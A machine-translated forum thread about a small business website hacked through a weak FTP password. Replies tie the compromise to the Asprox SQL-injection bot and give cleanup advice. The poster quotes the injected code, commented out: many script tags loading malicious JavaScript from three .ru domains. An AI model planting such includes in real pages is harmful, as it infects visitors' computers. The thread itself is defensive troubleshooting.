我父亲今天打电话给我,说他们去他的网站的人有168种病毒试图下载到他们的电脑上。他根本不是技术人员,用WYSIWYG编辑器构建了整个东西。
我打开他的网站并查看了源代码,在关闭HTML标记之前,源代码底部有一行Javascript包含。他们包括这个文件(以及许多其他文件):http://www.98hs.ru/js.js在你去URL之前关掉JAVASCRIPT。
所以我现在评论它。事实证明他的FTP密码是一个普通的字典单词六个字母长,所以我们认为这是如何被黑客攻击。我们已经将他的密码更改为一个8位以上的非单词字符串(他不会用密码短语,因为他是一个狩猎的傻瓜)。
我做了一个whois on 98hs.ru,发现它是从智利的服务器托管的。实际上还有一个与之相关的电子邮件地址,但我严重怀疑这个人是罪魁祸首。可能只是其他一些被黑客入侵的网站......
我不知道在这一点上该做什么,因为我以前从未处理过这类事情。有人有什么建议吗?
他通过webhost4life.com使用普通的jane un-secured ftp。我甚至没有看到在他们的网站上做sftp的方法。我在想他的用户名和密码被截获了吗?
因此,为了使这与社区更相关,您应采取哪些步骤/最佳做法,以保护您的网站免遭黑客入侵?
为了记录,这里是“神奇地”添加到他的文件中的代码行(并且不在他的计算机上的文件中 - 我留下它注释掉,只是为了绝对确定它不会做任何事情在这个页面上,虽然我确信杰夫会防范这个):
<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
尝试收集尽可能多的信息。查看主持人是否可以为您提供显示您帐户所有FTP连接的日志。您可以使用它们来查看它是否是用于进行更改并可能获取IP地址的FTP连接。
如果您使用的是预装软件,如Wordpress,Drupal或其他任何您未编码的软件,则上传代码中可能存在允许进行此类修改的漏洞。如果是自定义构建,请仔细检查允许用户上载文件或修改现有文件的任何位置。
第二件事是按原样转储网站并检查所有内容以进行其他修改。它可能只是一个单独的修改,但如果他们通过FTP进入,谁知道还有什么在那里。
将您的站点恢复到已知的良好状态,如果需要,请升级到最新版本。
您还必须考虑到一定程度的回报。损坏是否值得尝试跟踪此人,或者这是您生活和学习并使用更强密码的东西?
我知道这在游戏中有点晚了,但是在一个已知属于ASPRox机器人复兴的网站列表中提到了JavaScript提到的URL,该网站已于六月开始(至少在我们被标记为它)。有关它的一些细节提到如下:
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
令人讨厌的是,数据库中的每个varchar类型字段都被“感染”以吐出对此URL的引用,其中浏览器获取一个小的iframe,将其转换为机器人。可以在此处找到针对此的基本SQL修复:
http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx
但可怕的是,病毒会在系统表中查找要感染的值,并且许多共享主机计划也会为其客户共享数据库空间。所以很可能甚至不是你父亲的网站被感染了,但是他的托管集群中的其他人的网站写了一些不好的代码并打开了SQL注入攻击的大门。
如果他还没有这样做,我会向他们的主机发送一封紧急电子邮件,并给他们一个指向该SQL代码的链接来修复整个系统。您可以修复自己受影响的数据库表,但很可能正在进行感染的机器人将再次通过该漏洞并感染整个批次。
希望这能为您提供更多信息。
编辑:还有一个想法,如果他使用其中一个主机在线设计工具来构建他的网站,所有这些内容可能都坐在一个列中,并被感染了。
你提到你的爸爸正在使用网站发布工具。
如果发布工具从他的计算机发布到服务器,则可能是他的本地文件是干净的,并且他只需要重新发布到服务器。
他应该看看他的服务器是否有不同于普通FTP的登录方法,但是......这不是很安全,因为它通过互联网将密码作为明文发送。
该网站是否只是纯静态HTML?即他没有设法编写一个上传页面,允许任何人驾驶上传受损的脚本/页面?
如果他们有任何可用的FTP日志,为什么不询问webhost4life并向他们报告问题。你永远不会知道,他们可能非常善于接受,并准确地找到你发生的事情?
我为一个共享的主机工作,我们总是欢迎这些报告,并且通常可以确定基于攻击的确切向量,并建议客户出错的地方。
拔下Web服务器而不关闭它以避免关闭脚本。通过另一台计算机分析硬盘作为数据驱动器,看看你是否可以通过日志文件和那种性质的东西来确定罪魁祸首。验证代码是否安全,然后从备份中还原。
这发生在我最近在ipower上托管的我的客户端。我不确定你的托管环境是否基于Apache,但是如果确定要仔细检查你没有创建的.htaccess文件,特别是在webroot上面和图像目录内部,因为它们往往会在那里注入一些肮脏同样(他们根据他们在推荐中的来源重定向人员)。还要检查您为未编写的代码创建的任何内容。
我们显然是从同一个家伙被黑了!或者机器人,在我们的例子中。他们在一些古老的经典ASP网站上使用URL注入SQL,而这些ASP网站已经没有了。我们发现攻击IP并在IIS中阻止它们。现在我们必须重构所有旧的ASP。因此,我的建议是首先查看IIS日志,以查找问题是否在您站点的代码或服务器配置中。